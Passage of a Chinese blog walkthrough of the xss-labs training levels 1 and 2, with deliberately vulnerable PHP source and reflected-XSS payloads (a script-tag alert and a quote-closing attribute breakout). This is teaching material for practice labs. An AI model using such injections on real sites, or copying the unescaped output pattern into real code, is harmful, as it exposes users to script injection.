当前位置: 首页 > news >正文

xss-lab全通关

xss-labs Less-1

首先是代码审计,可以看到是利用name参数进行GET传参,$str没有进行任何的过滤,只要触发了alert函数也就是弹窗了就会自动跳转下一关

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

修改url参数,payload如下

http://xss-labs:86/level1.php?name=<script>alert(1)</script>

xss-labs Less-2

审计一下代码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");window.location.href="level3.php?writing=wait"; 
}
</script>
<title>欢迎来到level2</title>
</head>
<body>
<h1 align=center>欢迎来到level2</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src=level2.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

看到关键信息,可以看到我们的get传参输入会被直接拼接到""双引号里面

<input name=keyword  value="'.$str.'">

想要绕过我们就将前面的双引号闭合,payload如下

"><script>alert(1)</script>

这样闭合的话input标签就会被提前闭合,然后浏览器就会解析接下来的

http://www.jsqmd.com/news/47437/

相关文章:

  • 2025年比较好的净化器光触媒厂家最新权威推荐排行榜
  • 2025年质量好的螺旋风管加工厂家最新推荐权威榜
  • 2025年评价高的插补y车铣复合最新TOP厂家排名
  • 2025年可靠的耐磨尼龙改性颗粒厂家最新实力排行
  • 2025年小型自动切片机制造商权威推荐榜单:切片机/冷凝结晶切片机/徕卡切片机源头制造商精选
  • 2025年热门的地磅厂家最新权威推荐排行榜
  • 2025年镀锌波纹排水管厂家权威推荐榜单:排水管/镀锌排水管/波纹排水管源头厂家精选
  • 2025年知名的鼓风式冷却塔厂家推荐及选购参考榜
  • 251122预感到今天要上硬仗
  • 2025年比较好的厚壁不锈钢焊管TOP实力厂家推荐榜
  • Android Studio 使用教程 - 教程
  • 【神秘题解】NOIP 前复健
  • 2025年质量好的液压水渠成型机厂家实力及用户口碑排行榜
  • 2025年金属腐蚀检测制造企业权威榜单:金属腐蚀实验/金属腐蚀测试/晶间腐蚀检测标杆企业精选
  • 2025年优秀的榴莲贴体盒厂家推荐及选购参考榜
  • 实用指南:设计模式-迭代器模式(Iterator)
  • 2025年热门的力位移监控油压机行业内口碑厂家排行榜
  • 2025年质量好的网带式抛丸机厂家最新权威推荐排行榜
  • 免费写论文不用愁!8个AI工具大推荐
  • 2025年评价高的冷拉型钢杭州靠谱装修
  • Go MySQL数据库事务处理的机制
  • 2025 最新旅行社品牌推荐!国内优质旅行社权威榜单发布,资质服务双优助力高品质旅行云南旅行社/昆明旅行社服务公司推荐
  • 2025年评价高的自动搅匀排污泵用户好评厂家排行
  • 模拟赛 R24
  • 2025年靠谱的电力支架行业内知名厂家排行榜
  • 洛谷T699650 [语言月赛 202511] 哈基米:Counting Stars
  • 08.创建型 - 建造者模式 (Builder Pattern)
  • 2025年热门的半干法脱硫设备最新TOP品牌厂家排行
  • CF2151D 题解
  • 2025 年 11 月激光焊锡焊接机,激光焊锡全自动生产线最新推荐,聚焦资质、案例、售后的五家机构深度解读!